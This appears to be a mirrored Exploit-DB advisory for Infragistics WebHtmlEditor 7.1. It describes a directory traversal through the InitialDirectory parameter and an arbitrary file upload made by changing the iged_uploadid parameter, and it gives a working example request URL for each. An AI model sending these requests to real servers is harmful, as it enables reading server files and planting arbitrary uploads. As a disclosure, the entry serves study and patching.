Infragistics WebHtmlEditor 7.1 – Multiple Vulnerabilities

• Exploit Database
• 144 阅读

• 作者： SpeeDr00t
  日期： 2010-02-12
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/11414/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51

  ----------------------------------------------------------------------------------------------------------------------------- Infragistics WebHtmlEditor.v7.1(InitialDirectory,iged_uploadid ) directory Traversaland Arbitrary File upload vulnerability -----------------------------------------------------------------------------------------------------------------------------     proof of concept by KyoungChip, Jang ( SpeeDr00t )   [*] the bug : directory Traversaland Arbitrary File upload vulnerability   [*] application : Infragistics WebHtmlEditor.v7.1   [*] Vendor URL : http://www.infragistics.com     [*] homepage : cafe.naver.com/cwithme   [*] company : sk юн4sec   [*] Group : canvasTeam@SpeeDr00t   [*] Thank for : my wife(en hee) , my son(ju en, do en ), Zero-0x77, hoon     # directory Traversalvulnerability   A directory traversal vulnerability exists in Infragistics WebHtmlEditor.v7.1 which allows a remote user to view files local to the target server.   The parameters of the InitialDirectory ( InitialDirectory =../../ ) This form of attack can be manipulated directory travel.   poc ) InitialDirectory = ../../   ex) http://server/test.aspx?lang=&iged_uploadid=InsertImage&LocalizationType=English&LocalizationFile=&InitialDirectory=../../&num=1&parentId=WebHtmlEditor     # Arbitrary File upload vulnerability The parameters of the InsertImage the iged_uploadid can upload image files, but Open an attacker to change the parameters iged_uploadid Arbitrary File upload it enables.     http://server/test.aspx?lang=&iged_uploadid=Open&LocalizationType=English&LocalizationFile=&InitialDirectory=../../&num=1&parentId=WebHtmlEditor